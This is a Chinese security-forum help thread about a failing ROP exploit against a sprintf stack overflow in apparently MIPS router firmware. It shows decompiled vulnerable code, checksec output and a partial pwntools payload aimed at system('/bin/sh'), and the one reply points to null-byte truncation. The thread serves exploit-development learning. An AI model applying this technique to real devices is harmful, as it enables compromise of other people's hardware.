[求助]在利用sprintf进行rop时发现，只能跳一次，发送的payload加长之后就跳不了了，请问这是为什么-智能设备-看雪-安全社区|安全招聘|kanxue.com

[求助]在利用sprintf进行rop时发现，只能跳一次，发送的payload加长之后就跳不了了，请问这是为什么

2023-4-17 11:04 9828

[求助]在利用sprintf进行rop时发现，只能跳一次，发送的payload加长之后就跳不了了，请问这是为什么

话梅可乐

2023-4-17 11:04

9828

反编译代码

int __fastcall setInfo(int a1, const char *a2, const char *a3, const char *a4)
{
  int v5; // [sp+20h] [+20h] BYREF
  char v6[260]; // [sp+24h] [+24h] BYREF //v6到fp偏移为-0x104
 
  v5 = 0;
  memset(v6, 0, 0x100u);
  getId(a2, &v5);               // a2的偏移是0xc
  sprintf(v6, "%d;%s;%s;%s", a1, a2, a3, a4);   // overflow
  return modify_rule(v5, v6);
}

checksec

RELRO:    No RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x400000)

···
var_104=-0x104
···
addiu   $v0, $fp, 0x128+var_104

我写的exp

from pwn import *
 
···
# exp += b"b"*(0x92-len(exp)) +b'f'+ gadget + b'a'*0x1C + b'a'*4 + bin_sh_addr + gadget + b'a'*0x1C + b'a'*8 + system_addr
exp += b"b"*(0x93-len(exp)) + b'\x40\x01\x41'
···

用不注释的exp能跳转到system，但后面再加东西就跳不到system了，我也就没办法给system传参，这是为什么？
另外，实际实现rop的偏移跟我一开始计算的偏移不一样，我是用-(0x128-0x24+4)计算得到的v6到ra偏移,但这个没法用，后来用二分法试才试出现在的偏移，这是算错了吗?
请指教！

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

最后于 2023-4-17 13:51 被话梅可乐编辑，原因：

#家用设备 #固件分析 #安全研究 #基础理论

收藏・0

点赞・0

打赏

最新回复 (1)
丿feng 雪币： 7550 活跃值： (1211) 能力值： ( LV12，RANK：256 ) 在线值：发帖 7 回帖 27 粉丝 9 关注私信	丿feng 3 2023-5-10 14:36 2 楼 0 %0截断
	游客登录 \| 注册方可回帖　回帖　表情雪币赚取及消费高级回复